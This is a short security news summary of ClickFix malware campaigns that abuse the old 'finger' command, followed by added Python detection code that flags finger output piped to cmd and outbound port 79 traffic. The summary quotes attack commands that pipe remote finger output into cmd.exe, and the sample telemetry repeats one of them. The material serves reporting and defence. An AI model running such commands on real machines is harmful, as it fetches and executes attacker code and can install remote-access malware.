BleepingComputer reports that threat actors have revived the abuse of the decades-old "finger" command to facilitate remote command execution as part of new ClickFix malware attacks. After identifying a batch file that used the "finger [email protected][.]com" command to fetch commands that were then executed via cmd.exe, MalwareHunterTeam discovered a ClickFix campaign that used the "finger [email protected] | cmd" command to execute commands, akin to another campaign reported by a Reddit user. Despite the similarities, the intrusion spotted by MalwareHunterTeam was noted to be more sophisticated because it included commands that searched for malware research tools, including WinDump, filemon, Procmon, x64dbg, vmmap, processlasso, Fiddler, and Everywhere. If no malware analysis tools are found, a ZIP archive disguised as a PDF is loaded, from which the NetSupport Manager RAT package is extracted. Effectively combating the exploitation of the finger command requires blocking outgoing traffic to TCP port 79.
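For detection alongside the port 79 block, the following is an added example (not code from BleepingComputer or MalwareHunterTeam) that triages process and network telemetry for the pattern described above: a remote finger lookup whose output is piped into a command interpreter. The event schema (`kind`, `host`, `cmdline`, `dest_port`), the function names and the sample events are assumptions constructed for illustration.

```python
import re

# finger / finger.exe (optionally path-qualified or quoted) given a user@host or @host argument.
FINGER_REMOTE = re.compile(r'(?i)(?:^|[\s"&|(\\/])finger(?:\.exe)?"?\s+[^|&>]*@[^\s|&>"]+')
# A pipe into a command interpreter somewhere after the finger call.
PIPE_TO_SHELL = re.compile(r'(?i)\|\s*"?(?:[^\s|"]*\\)?(?:cmd|powershell|pwsh)(?:\.exe)?\b')

def score_cmdline(cmdline):
    """Return 'high' when remote finger output is piped to a shell,
    'medium' for any remote finger lookup, None otherwise."""
    m = FINGER_REMOTE.search(cmdline)
    if m is None:
        return None
    if PIPE_TO_SHELL.search(cmdline, m.end()):
        return "high"
    return "medium"

def triage(events):
    """Yield (host, severity, reason) for events in the assumed schema."""
    findings = []
    for ev in events:
        if ev["kind"] == "process":
            sev = score_cmdline(ev["cmdline"])
            if sev == "high":
                findings.append((ev["host"], sev, "finger output piped to shell"))
            elif sev == "medium":
                findings.append((ev["host"], sev, "remote finger lookup"))
        elif ev["kind"] == "network" and ev.get("dest_port") == 79:
            # Outbound TCP/79 should not occur once the egress block is in place.
            findings.append((ev["host"], "medium", "outbound TCP/79"))
    return findings

# Constructed sample telemetry; hostnames and addresses are placeholders.
SAMPLE_EVENTS = [
    {"kind": "process", "host": "ws01", "cmdline": "cmd.exe /c finger user@host.example | cmd"},
    {"kind": "process", "host": "ws02",
     "cmdline": r'"C:\Windows\System32\finger.exe" admin@intranet.example'},
    {"kind": "process", "host": "ws03", "cmdline": "findstr /i finger notes.txt"},
    {"kind": "process", "host": "ws04", "cmdline": "fingerprint-tool --user a@b.example"},
    {"kind": "network", "host": "ws01", "dest_port": 79},
    {"kind": "network", "host": "ws05", "dest_port": 443},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```
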




